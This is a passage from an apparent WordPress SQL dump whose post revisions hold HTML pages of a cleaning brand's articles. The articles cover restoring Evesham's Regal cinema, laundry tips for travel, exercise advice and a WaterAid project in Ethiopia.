1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html xmlns=\"http://www.w3.org/1999/xhtml\" xml:lang=\"en\" lang=\"en\">\n<head>\n	\n	<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/>\n    <link rel=\"canonical\" href=\"http://www.the-splash.co.uk/articles/regal-cinema\">\n		<link media=\"screen\" rel=\"stylesheet\" href=\"../../css/all.css\" type=\"text/css\"/>\n    <link rel=\"stylesheet\" type=\"text/css\" href=\"../../css/print.css\" media=\"print\"/>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../css/fancybox.css\" type=\"text/css\"/>\n	<!--<script type=\"text/javascript\" src=\"https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js\"></script>-->\n    <script type=\"text/javascript\" src=\"../../ajax/libs/jquery/1.9.1/jquery.min.js\"></script>\n	<script type=\"text/javascript\" src=\"../../js/jquery.browser.js\"></script>\n    <script type=\"text/javascript\" src=\"../../js/all.js\"></script>\n	<!--<script type=\"text/javascript\" src=\"/js/jquery.moodular.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.controls.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.effects.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery-ui-1.8.14.custom.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tools.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tooltip.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.imagesloaded.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.masonry.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.inputlimiter.1.2.2.min.js\"></script>\n    <script type=\"text/javascript\" src=\"/js/jquery.vticker.1.4.js\"></script>-->\n	<script type=\"text/javascript\" src=\"../../js/jquery.main.js\"></script>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../js/jquery.tooltip.css\" type=\"text/css\"/>\n	<script type=\"text/javascript\" src=\"../../js/fancybox/jquery.mousewheel-3.0.4.pack.js\"></script>\n	<script type=\"text/javascript\" src=\"../../js/fancybox/jquery.fancybox-1.3.4.pack.js\"></script>\n	<link rel=\"stylesheet\" type=\"text/css\" href=\"../../js/fancybox/jquery.fancybox-1.3.4.css\" media=\"screen\"/>\n	<!--[if lt IE 7]>\n		\n		\n	<![endif]-->\n	<!--[if lt IE 8]><link rel=\"stylesheet\" type=\"text/css\" href=\"/css/ie.css\" media=\"screen\"><![endif]-->\n   \n  var _gaq = _gaq || [];\n  _gaq.push([\'_setAccount\', \'UA-22968591-1\']);\n  _gaq.push([\'_trackPageview\']);\n  (function() {\n    var ga = document.createElement(\'script\'); ga.type = \'text/javascript\'; ga.async = true;\n    ga.src = (\'https:\' == document.location.protocol ? \'https://ssl/\' : \'http://www/\') + \'.google-analytics.com/ga.js\';\n    var s = document.getElementsByTagName(\'script\')[0]; s.parentNode.insertBefore(ga, s);\n  })();\n</script><title>\n</title></head>\n<body id=\"ctl00_body1\" class=\"articles-section organisations-we-support-subsection\">\n    <form name=\"aspnetForm\" method=\"post\" action=\"../../articles/regal-cinema/\" id=\"aspnetForm\">\n      <div class=\"body\">\n        <div class=\"wrapper\">\n          <div class=\"w1\">\n            <div class=\"w2\">\n              <div class=\"w3\">\n                <div id=\"main\">\n                  <div class=\"box\">\n                    <div class=\"c\">\n                      <div class=\"content\">\n                        \n                        <div id=\"twocolumns\">\n                          <div id=\"content\">\n												<div class=\"twocols\">\n													<div class=\"content\">\n														<h2 class=\"title\">The Big Clean Up - Restoring The Regal</h2>\n														\n                                                        <p>\n                                                            When The Regal cinema first opened its doors in 1932, it provided the people of Evesham with more than just a place to woo their intended on Saturday nights; it gave cinema lovers of all ages the chance to escape into a world of daring adventures, epic battles and thrilling mysteries, served with a popcorn-bucket full of Hollywood glamour.\n                                                        </p>\n                                                        <p>\n                                                            Throughout the movie industry\'s heyday, The Regal could seat over 1,000 and drew in a crowd of more than a million every year. Over time, it became a central part of the local community and earned its place in Evesham\'s history books. From usherettes and projectionists who worked the screens to visitors who met their wartime sweethearts, the venue holds many fond memories for the locals. \n                                                        </p>\n                                                        \n                                                        <p>\n                                                            Sadly, as modern multiplexes lured filmgoers away with the promise of blockbusters and big screens, The Regal\'s popularity dwindled and it was forced to close its doors in 2003. For over 6 years the projectors lay silent and the silver screens featureless... until father-and-son team Ian and Laurence Wiper decided it was time to make The Regal worthy of its name once more.\n                                                        </p>\n                                                        <p>\n                                                            A real labour of love, the project would be a costly undertaking not without its hurdles. But before they could assess the true scale of the improvements needed, a good old-fashioned clean up was required. They turned to Daily to remove the years of grime that now covered the walls and surfaces, and Emma Bennetts (our very own brand manager) jumped at the chance to help. \"When we heard about the project we were really excited that our products were being used by the team at The Regal Cinema to preserve such an important part of the interior,” she explained.\n                                                        </p>\n                                                        \n                                                        <p>\n                                                            Workers at The Regal had discovered that Daily products were powerful enough to get rid of the dirt and dust, yet gentle enough to preserve the original features, such as the art deco wallpaper and woodwork. While our first thought was to donate our products to the cause, we knew we could do more... so we decided to roll up our sleeves and get stuck into \'The Big Clean Up\'. \n                                                        </p>\n                                                        <p>\n                                                            Alongside some willing volunteers, all armed with Daily sprays and cleaning equipment, aprons and protective clothing, we scrubbed, brushed, washed and wiped away the grime; over 40 years of nicotine stains were cleaned from the walls in preparation for the next phase of development. According to Laurence Wiper, \"The cleaning event made a massive difference and about one third of the wall space is now ready for painting, which isn\'t bad for one day. If we didn\'t have these volunteers to help us we would be looking at a fortnight\'s worth of work.\"\n                                                        </p>\n                                                        \n                                                        <p>\n                                                            The restoration project is ongoing and with every week that passes The Regal is being revived. In 2009, Alistair McGowan became a patron, raising both the profile of the project, and some much needed funds with a gig show entitled \'The Regal Big Weekend\'. And thanks to a recent &pound;2million investment from Wychavon Council, this famed venue is set take its place at the heart of Evesham\'s community once again. Much more than just a cinema, at The Regal you\'ll be able to meet for a coffee or a pre-show drink, see live music and performance, take in an art exhibition or dine in style in its rooftop restaurant.\n                                                        </p>\n                                                        <p>\n                                                            At Daily, we were delighted to offer a helping hand to such a deserving, community-led project. As Emma puts it, \"We thought it was fantastic that the local community is right behind the restoration of the venue for people to enjoy once again\". So if you\'re ever near Evesham, make sure you stop by; there\'s no finer place to catch a film.\n													    </p>\n                                                        <div class=\"share-this\">\n														    <div class=\"tweet-form\"></div>\n													    </div>\n													</div>\n												</div>\n                          </div>\n                        </div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n                <div id=\"inner-footer\">\n						</div>\n					</div>\n				</div>\n				\n			</div>\n		</div>\n  </div>\n    </form>\n</body>\n</html>','Regal Cinema','','inherit','closed','closed','','53-autosave-v1','','','2017-10-17 08:51:36','2017-10-17 08:51:36','',53,'http://www.dailyjolly.co.uk/53-autosave-v1',0,'revision','',0),(99,1,'2017-10-17 08:51:44','2017-10-17 08:51:44','<h2 class=\"title\">The Big Clean Up - Restoring The Regal</h2>\r\nWhen The Regal cinema first opened its doors in 1932, it provided the people of Evesham with more than just a place to woo their intended on Saturday nights; it gave cinema lovers of all ages the chance to escape into a world of daring adventures, epic battles and thrilling mysteries, served with a popcorn-bucket full of Hollywood glamour.\r\n\r\nThroughout the movie industry\'s heyday, The Regal could seat over 1,000 and drew in a crowd of more than a million every year. Over time, it became a central part of the local community and earned its place in Evesham\'s history books. From usherettes and projectionists who worked the screens to visitors who met their wartime sweethearts, the venue holds many fond memories for the locals.\r\n\r\nSadly, as modern multiplexes lured filmgoers away with the promise of blockbusters and big screens, The Regal\'s popularity dwindled and it was forced to close its doors in 2003. For over 6 years the projectors lay silent and the silver screens featureless... until father-and-son team Ian and Laurence Wiper decided it was time to make The Regal worthy of its name once more.\r\n\r\nA real labour of love, the project would be a costly undertaking not without its hurdles. But before they could assess the true scale of the improvements needed, a good old-fashioned clean up was required. They turned to Daily to remove the years of grime that now covered the walls and surfaces, and Emma Bennetts (our very own brand manager) jumped at the chance to help. \"When we heard about the project we were really excited that our products were being used by the team at The Regal Cinema to preserve such an important part of the interior,” she explained.\r\n\r\nWorkers at The Regal had discovered that Daily products were powerful enough to get rid of the dirt and dust, yet gentle enough to preserve the original features, such as the art deco wallpaper and woodwork. While our first thought was to donate our products to the cause, we knew we could do more... so we decided to roll up our sleeves and get stuck into \'The Big Clean Up\'.\r\n\r\nAlongside some willing volunteers, all armed with Daily sprays and cleaning equipment, aprons and protective clothing, we scrubbed, brushed, washed and wiped away the grime; over 40 years of nicotine stains were cleaned from the walls in preparation for the next phase of development. According to Laurence Wiper, \"The cleaning event made a massive difference and about one third of the wall space is now ready for painting, which isn\'t bad for one day. If we didn\'t have these volunteers to help us we would be looking at a fortnight\'s worth of work.\"\r\n\r\nThe restoration project is ongoing and with every week that passes The Regal is being revived. In 2009, Alistair McGowan became a patron, raising both the profile of the project, and some much needed funds with a gig show entitled \'The Regal Big Weekend\'. And thanks to a recent £2million investment from Wychavon Council, this famed venue is set take its place at the heart of Evesham\'s community once again. Much more than just a cinema, at The Regal you\'ll be able to meet for a coffee or a pre-show drink, see live music and performance, take in an art exhibition or dine in style in its rooftop restaurant.\r\n\r\nAt Daily, we were delighted to offer a helping hand to such a deserving, community-led project. As Emma puts it, \"We thought it was fantastic that the local community is right behind the restoration of the venue for people to enjoy once again\". So if you\'re ever near Evesham, make sure you stop by; there\'s no finer place to catch a film.\r\n<div class=\"share-this\"></div>\r\n<div id=\"inner-footer\"></div>\r\n&nbsp;','Regal Cinema','','inherit','closed','closed','','53-revision-v1','','','2017-10-17 08:51:44','2017-10-17 08:51:44','',53,'http://www.dailyjolly.co.uk/53-revision-v1',0,'revision','',0),(100,1,'2017-10-17 08:51:57','2017-10-17 08:51:57','<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html xmlns=\"http://www.w3.org/1999/xhtml\" xml:lang=\"en\" lang=\"en\">\n<head>\n	\n	<meta name=\"description\" content=\"Ecover\'s advice for staying cleaner and greener, on your holidays.\"/>\n	<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/>\n	<link rel=\"canonical\" href=\"http://www.the-splash.co.uk/articles/travel-hints-and-tips\">\n		<link media=\"screen\" rel=\"stylesheet\" href=\"../../css/all.css\" type=\"text/css\"/>\n    <link rel=\"stylesheet\" type=\"text/css\" href=\"../../css/print.css\" media=\"print\"/>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../css/fancybox.css\" type=\"text/css\"/>\n	<!--<script type=\"text/javascript\" src=\"https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js\"></script>-->\n    <script type=\"text/javascript\" src=\"../../ajax/libs/jquery/1.9.1/jquery.min.js\"></script>\n	<script type=\"text/javascript\" src=\"../../js/jquery.browser.js\"></script>\n    <script type=\"text/javascript\" src=\"../../js/all.js\"></script>\n	<!--<script type=\"text/javascript\" src=\"/js/jquery.moodular.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.controls.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.effects.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery-ui-1.8.14.custom.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tools.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tooltip.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.imagesloaded.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.masonry.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.inputlimiter.1.2.2.min.js\"></script>\n    <script type=\"text/javascript\" src=\"/js/jquery.vticker.1.4.js\"></script>-->\n	<script type=\"text/javascript\" src=\"../../js/jquery.main.js\"></script>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../js/jquery.tooltip.css\" type=\"text/css\"/>\n	<script type=\"text/javascript\" src=\"../../js/fancybox/jquery.mousewheel-3.0.4.pack.js\"></script>\n	<script type=\"text/javascript\" src=\"../../js/fancybox/jquery.fancybox-1.3.4.pack.js\"></script>\n	<link rel=\"stylesheet\" type=\"text/css\" href=\"../../js/fancybox/jquery.fancybox-1.3.4.css\" media=\"screen\"/>\n	<!--[if lt IE 7]>\n		\n		\n	<![endif]-->\n	<!--[if lt IE 8]><link rel=\"stylesheet\" type=\"text/css\" href=\"/css/ie.css\" media=\"screen\"><![endif]-->\n   \n  var _gaq = _gaq || [];\n  _gaq.push([\'_setAccount\', \'UA-22968591-1\']);\n  _gaq.push([\'_trackPageview\']);\n  (function() {\n    var ga = document.createElement(\'script\'); ga.type = \'text/javascript\'; ga.async = true;\n    ga.src = (\'https:\' == document.location.protocol ? \'https://ssl/\' : \'http://www/\') + \'.google-analytics.com/ga.js\';\n    var s = document.getElementsByTagName(\'script\')[0]; s.parentNode.insertBefore(ga, s);\n  })();\n</script><title>\n</title></head>\n<body id=\"ctl00_body1\" class=\"articles-section helpful-hints-and-tips-subsection\">\n    <form name=\"aspnetForm\" method=\"post\" action=\"../../articles/travel-hints-and-tips/\" id=\"aspnetForm\">\n      <div class=\"body\">\n        <div class=\"wrapper\">\n          <div class=\"w1\">\n            <div class=\"w2\">\n              <div class=\"w3\">\n                <div id=\"main\">\n                  <div class=\"box\">\n                    <div class=\"c\">\n                      <div class=\"content\">\n                        \n                        <div id=\"twocolumns\">\n                          <div id=\"content\">\n												<div class=\"twocols\">\n													<div class=\"content\">\n														<h2 class=\"title\">Daily\'s cleaner, greener travel tips</h2>\n														<p>\n														    Whether you\'re planning a camping trip here in Blighty or are jetting off to a tropical beach, having some handy laundry tips up your sleeve means you can pack lighter and look fresher all holiday long. And you\'ll have more room for more pressies.\n                                                        </p>\n                                                        <ol>\n                                                            <li><strong>Plan your wardrobe well</strong> - lighter, wrinkle resistant clothes generally dry faster and shouldn\'t need an iron. Think layers. That way you can get away with just washing the inner layers when they need it.</li>\n                                                            <li><strong>Bring what you need</strong> - pour some of your <a href=\"http://www.ecoverdirect.com/products/delicate-laundry-liquid-500ml/edelicate500ml.aspx?productid=edelicate500ml\" onclick=\"return t(\'offsite\', this.href);\" target=\"_blank\">Daily Delicate laundry detergent</a> into a travel bottle. It\'s gentle on you when handwashing and a little goes a long way. And a length of cord can make a great washing line.</li>\n                                                            <li><strong>Think ahead</strong> - plan your laundry drying times so that you don\'t end up having to wear or pack damp clothes.</li>\n                                                            <li><strong>The creative washing line</strong> - bed frames, towel rails, shower rails, balcony chairs and good old clothes hangers are all great options for hanging things up to dry in hotels. Guy ropes, car door frames and cleverly rigged up tent-to-car lines are good camp options. Check out how much drying space you have before you start washing.</li>\n                                                            <li><strong>Use shower power</strong> - smaller items can get a good wash on the shower floor while you soap up. Just rinse in the sink afterwards.</li>\n                                                            <li><strong>Squeeze, don\'t wring</strong> - after washing and rinsing your clothes, squeeze out the water, rather than wringing. It will help your clothes keep their shape better.</li>\n                                                            <li><strong>Towel dry</strong> - we find the best way to get the most water out and avoid dripping is to roll them in a towel. Simply lay the item on a flat towel. Then roll it up from one end and squeeze the whole thing tightly.</li>\n                                                            <li><strong>Hang \'em up</strong> - leave space between the clothes so they dry faster. If you\'re indoors and you can leave a window open, even better. </li>\n                                                            <li><strong>Not quite dry?</strong> You could leave it hanging for another day, finish it off with an iron if you have one or just wear it anyway and let your body heat dry it.</li>\n                                                            <li><strong>Freshen yourself with Daily</strong> - our <a href=\"http://www.ecoverdirect.com/products/mizu-body-wash-250ml/emizshow250ml.aspx?productid=emizshow250ml\" onclick=\"return t(\'offsite\', this.href);\" target=\"_blank\">Mizu body washes</a> and <a href=\"http://www.ecoverdirect.com/products/mizu-body-lotion---normal-skin/emizlothydrat.aspx?productid=emizlothydrat\" onclick=\"return t(\'offsite\', this.href);\" target=\"_blank\">lotions</a> are made from plant based ingredients, making them kinder to you, your family and nature. The perfect holiday companions! </li>\n                                                        </ol>\n														\n													</div>\n												</div>\n                          </div>\n                        </div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n                <div id=\"inner-footer\">\n						</div>\n					</div>\n				</div>\n				\n			</div>\n		</div>\n  </div>\n    </form>\n</body>\n</html>','Travel Hints and Tips','Ecover\'s advice for staying cleaner and greener, on your holidays.','inherit','closed','closed','','57-revision-v1','','','2017-10-17 08:51:57','2017-10-17 08:51:57','',57,'http://www.dailyjolly.co.uk/57-revision-v1',0,'revision','',0),(101,1,'2017-10-17 08:52:07','2017-10-17 08:52:07','<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html xmlns=\"http://www.w3.org/1999/xhtml\" xml:lang=\"en\" lang=\"en\">\n<head>\n	\n	<meta name=\"description\" content=\"Frankie, our Feel Good expert, gives tips on how to start your own exercise routine and which muscles to focus on so you can look good on the beach this summer.\"/>\n	<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/>\n    <link rel=\"canonical\" href=\"http://www.the-splash.co.uk/articles/starting-an-exercise-routine\">\n		<link media=\"screen\" rel=\"stylesheet\" href=\"../../css/all.css\" type=\"text/css\"/>\n    <link rel=\"stylesheet\" type=\"text/css\" href=\"../../css/print.css\" media=\"print\"/>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../css/fancybox.css\" type=\"text/css\"/>\n	<!--<script type=\"text/javascript\" src=\"https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js\"></script>-->\n    <script type=\"text/javascript\" src=\"../../ajax/libs/jquery/1.9.1/jquery.min.js\"></script>\n	<script type=\"text/javascript\" src=\"../../js/jquery.browser.js\"></script>\n    <script type=\"text/javascript\" src=\"../../js/all.js\"></script>\n	<!--<script type=\"text/javascript\" src=\"/js/jquery.moodular.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.controls.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.effects.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery-ui-1.8.14.custom.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tools.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tooltip.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.imagesloaded.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.masonry.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.inputlimiter.1.2.2.min.js\"></script>\n    <script type=\"text/javascript\" src=\"/js/jquery.vticker.1.4.js\"></script>-->\n	<script type=\"text/javascript\" src=\"../../js/jquery.main.js\"></script>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../js/jquery.tooltip.css\" type=\"text/css\"/>\n	<script type=\"text/javascript\" src=\"../../js/fancybox/jquery.mousewheel-3.0.4.pack.js\"></script>\n	<script type=\"text/javascript\" src=\"../../js/fancybox/jquery.fancybox-1.3.4.pack.js\"></script>\n	<link rel=\"stylesheet\" type=\"text/css\" href=\"../../js/fancybox/jquery.fancybox-1.3.4.css\" media=\"screen\"/>\n	<!--[if lt IE 7]>\n		\n		\n	<![endif]-->\n	<!--[if lt IE 8]><link rel=\"stylesheet\" type=\"text/css\" href=\"/css/ie.css\" media=\"screen\"><![endif]-->\n   \n  var _gaq = _gaq || [];\n  _gaq.push([\'_setAccount\', \'UA-22968591-1\']);\n  _gaq.push([\'_trackPageview\']);\n  (function() {\n    var ga = document.createElement(\'script\'); ga.type = \'text/javascript\'; ga.async = true;\n    ga.src = (\'https:\' == document.location.protocol ? \'https://ssl/\' : \'http://www/\') + \'.google-analytics.com/ga.js\';\n    var s = document.getElementsByTagName(\'script\')[0]; s.parentNode.insertBefore(ga, s);\n  })();\n</script><title>\n</title></head>\n<body id=\"ctl00_body1\" class=\"articles-section helpful-hints-and-tips-subsection\">\n    <form name=\"aspnetForm\" method=\"post\" action=\"../../articles/starting-an-exercise-routine/\" id=\"aspnetForm\">\n      <div class=\"body\">\n        <div class=\"wrapper\">\n          <div class=\"w1\">\n            <div class=\"w2\">\n              <div class=\"w3\">\n                <div id=\"main\">\n                  <div class=\"box\">\n                    <div class=\"c\">\n                      <div class=\"content\">\n                        \n                        <div id=\"twocolumns\">\n                          <div id=\"content\">\n												<div class=\"twocols\">\n													<div class=\"content\">\n														<h2 class=\"title\">Our advice - Starting an exercise routine</h2>\n														\n                                                        <ol class=\"q-and-a\">\n                                                            <li>\n                                                                <strong>What are the best exercises for getting a beach-ready torso for the summer?</strong><br/>\n                                                                <i>In addition to exercising to achieve a beach-ready torso, it\'s important to get your diet right. We all tend to indulge in comfort food over the winter but naturally we swing a bit more to the healthy stuff in the summer months. Make sure you drink lots of water and eat fresh salad, fruit and lovely vegetables. The staples for a fit torso are sit-ups, push-ups and squats, but don\'t forget the simple things such as walking, even if just locally, is a great way to boost your fitness levels.</i>\n                                                            </li>\n                                                            <li>\n                                                                <strong>How do I tone up my arms? Can you give us your top five exercises?</strong><br/>\n                                                                <i>It\'s not a good idea to go straight into vigorous exercise if you\'ve not done anything for a while, build up the intensity gently. Perhaps start with some resistance work, I like to use resistance bands then tone up the arms with bicep curls and triceps push (like a reverse push up) and lat-pulls.</i>\n                                                            </li>\n                                                            <li>\n                                                                <strong>What advice would you give someone who is just starting out on a new fitness regime?</strong><br/>\n                                                                <i>Don\'t set your expectations too high. Be realistic with the time you can commit and set targets that are achievable. To give yourself five dedicated minutes of working out a day is not a bad place to start, as this will be five minutes more than you did yesterday. I\'m a believer in doing small bits of exercise regularly, even starting out by Cleanercising for some light exercise before moving onto more rigorous exercises.</i>\n                                                            </li>\n                                                            <li>\n                                                                <strong>What are the best exercises to target male problem areas such as the stomach that will help to build good core muscles?</strong><br/>\n                                                                <i>The \'Plank\' is a fantastic exercise; I do this for about two minutes every day. Essentially this is supporting the whole body with just your toes and forearms on the floor. Start with 20 second bursts and increase this as you get more confident and your strength builds up. Obviously the basic sit-up delivers results as does lying on your back and raising your feet six inches in the air and holding for as long as you can. Remember to stretch out your abs when you are done, you can do this by rolling onto your stomach and arching your back. This helps prevent stiffness the next day and helps to promote definition.</i>\n                                                            </li>\n                                                            <li>\n                                                                <strong>What sport offers the best fitness results?</strong><br/>\n                                                                <i>The best sport to achieve great results is always going to be the sport that you enjoy the most. You must enjoy whatever you do, you then will keep  going and therefore achieve results. Select an activity that you look forward to doing as this will keep you motivated and ensure you stick to it. It could be swimming, walking or cycling for instance.</i>\n                                                            </li>\n                                                            <li>\n                                                                <strong>What are the best toning exercises you can do in the home?</strong><br/>\n                                                                <i>I\'m not a believer in spending loads of money on gym membership. I do all my non-skating exercises at home. Sit ups, the plank, push-ups etc. are all so easy to do at home as well as using household items such as Daily washing-up liquid as weights.</i>\n                                                            </li>\n                                                            <li>\n                                                                <strong>What is the quickest way to get fit? Do I need to pull a log up a mountain like Rocky?</strong><br/>\n                                                                <i>There is no quick way! It has to be a lifestyle choice, that\'s why I suggest a small amount of exercise daily so you are most likely going to stick with it. Being realistic is one of the best ways to keep motivated.</i>\n                                                            </li>\n                                                            <li>\n                                                                <strong>Is it best to work different muscle groups in different sessions i.e. shoulders and back and then chest and arms?</strong><br/>\n                                                                <i>This all comes down to individual preference but don\'t forget to work your calves, legs and core. It is easy to incorporate more than one muscle group into one activity and do remember that for muscles to grow and repair themselves, they need rest, so doing bicep curls every single day is not advisable in the long term. It\'s important to be sensible with your approach and not be obsessive about one group or certain muscles; it is overall fitness that\'s the key.</i>\n                                                            </li>\n                                                            <li>\n                                                                <strong>What exercises would you recommend for couples to take part in together?</strong><br/>\n                                                            <i>The more people you can share your exercise programme with the better. Involving others will help keep you motivated and pretty much anything you do as a single person can be done as a couple.</i></li>\n                                                        </ol>\n													</div>\n												</div>\n                          </div>\n                        </div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n                <div id=\"inner-footer\">\n						</div>\n					</div>\n				</div>\n				\n			</div>\n		</div>\n  </div>\n    </form>\n</body>\n</html>','Start your Feel Good exercise routine with us','Frankie, our Feel Good expert, gives tips on how to start your own exercise routine and which muscles to focus on so you can look good on the beach this summer.','inherit','closed','closed','','56-revision-v1','','','2017-10-17 08:52:07','2017-10-17 08:52:07','',56,'http://www.dailyjolly.co.uk/56-revision-v1',0,'revision','',0),(102,1,'2017-10-17 08:52:15','2017-10-17 08:52:15','<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html xmlns=\"http://www.w3.org/1999/xhtml\" xml:lang=\"en\" lang=\"en\">\n<head>\n	\n	<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/>\n    <link rel=\"canonical\" href=\"http://www.the-splash.co.uk/articles/wateraid-ethiopia\">\n		<link media=\"screen\" rel=\"stylesheet\" href=\"../../css/all.css\" type=\"text/css\"/>\n    <link rel=\"stylesheet\" type=\"text/css\" href=\"../../css/print.css\" media=\"print\"/>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../css/fancybox.css\" type=\"text/css\"/>\n	<!--<script type=\"text/javascript\" src=\"https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js\"></script>-->\n    <script type=\"text/javascript\" src=\"../../ajax/libs/jquery/1.9.1/jquery.min.js\"></script>\n	<script type=\"text/javascript\" src=\"../../js/jquery.browser.js\"></script>\n    <script type=\"text/javascript\" src=\"../../js/all.js\"></script>\n	<!--<script type=\"text/javascript\" src=\"/js/jquery.moodular.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.controls.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.effects.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery-ui-1.8.14.custom.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tools.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tooltip.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.imagesloaded.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.masonry.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.inputlimiter.1.2.2.min.js\"></script>\n    <script type=\"text/javascript\" src=\"/js/jquery.vticker.1.4.js\"></script>-->\n	<script type=\"text/javascript\" src=\"../../js/jquery.main.js\"></script>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../js/jquery.tooltip.css\" type=\"text/css\"/>\n	<script type=\"text/javascript\" src=\"../../js/fancybox/jquery.mousewheel-3.0.4.pack.js\"></script>\n	<script type=\"text/javascript\" src=\"../../js/fancybox/jquery.fancybox-1.3.4.pack.js\"></script>\n	<link rel=\"stylesheet\" type=\"text/css\" href=\"../../js/fancybox/jquery.fancybox-1.3.4.css\" media=\"screen\"/>\n	<!--[if lt IE 7]>\n		\n		\n	<![endif]-->\n	<!--[if lt IE 8]><link rel=\"stylesheet\" type=\"text/css\" href=\"/css/ie.css\" media=\"screen\"><![endif]-->\n   \n  var _gaq = _gaq || [];\n  _gaq.push([\'_setAccount\', \'UA-22968591-1\']);\n  _gaq.push([\'_trackPageview\']);\n  (function() {\n    var ga = document.createElement(\'script\'); ga.type = \'text/javascript\'; ga.async = true;\n    ga.src = (\'https:\' == document.location.protocol ? \'https://ssl/\' : \'http://www/\') + \'.google-analytics.com/ga.js\';\n    var s = document.getElementsByTagName(\'script\')[0]; s.parentNode.insertBefore(ga, s);\n  })();\n</script><title>\n</title></head>\n<body id=\"ctl00_body1\" class=\"articles-section organisations-we-support-subsection\">\n    <form name=\"aspnetForm\" method=\"post\" action=\"../../articles/wateraid-ethiopia/\" id=\"aspnetForm\">\n      <div class=\"body\">\n        <div class=\"wrapper\">\n          <div class=\"w1\">\n            <div class=\"w2\">\n              <div class=\"w3\">\n                <div id=\"main\">\n                  <div class=\"box\">\n                    <div class=\"c\">\n                      <div class=\"content\">\n                        \n                        <div id=\"twocolumns\">\n                          <div id=\"content\">\n												<div class=\"twocols\">\n													<div class=\"content\">\n														<h2 class=\"title\">An Daily and WaterAid Project</h2>\n														\n														<p>\n                                                            Clean water is and always has been an issue that\'s close to our hearts, so when the opportunity to support <a onclick=\"return t(\'offsite\', this.href);\" href=\"http://www.wateraid.org/uk/\" rel=\"nofollow\" target=\"_blank\">WaterAid</a> projects presented itself, we jumped at the chance to help.\n                                                        </p>\n														<p>\n                                                            A good <a href=\"../../friends/wateraid/\">friend of Daily</a>, WaterAid is a charity that works to defend what it believes is every person\'s basic right - the right to clean water. For over 30 years WaterAid has been helping some of the world\'s poorest communities in 26 countries across Africa, Asia and the Pacific region access clean water, sanitation and hygiene. WaterAid believes in giving communities ownership of projects, using simple, low-cost solutions which are easy for communities to maintain themselves. By educating communities about sanitation and hygiene, the solutions WaterAid puts in place can be sustained for future generations. WaterAid\'s work has saved countless lives, and we\'re delighted to be partnering with them on one of their latest projects. \n                                                        </p>\n														\n														<p>\n                                                            Located in rural Ethiopia, the first project\'s aim was to give 14,750 people access to safe water and sanitation, starting with protecting five springs, constructing eight hand-dug wells with hand-pumps and installing rainwater harvesting systems for both schools and health centres. The project provides improved sanitation through the construction of traditional pit toilets serving 1350 households along with safe waste disposal pits for 1600 households, and gives locals hygiene training and promotion. To ensure the ongoing success of the project, WaterAid will also establish 18 water and sanitation committees, and train water technicians and community health educators.\n                                                        </p>\n														<p>\n                                                            Having worked so closely with WaterAid we know just how precious water is, which is why we don\'t take one drop for granted. For example, both our factories have a living, green, Sedum roof that needs very little water - but if it does get a little parched during the summer months, we use the rainwater we\'ve collected. In our French factory, rainwater is also used to flush the toilets. \n                                                        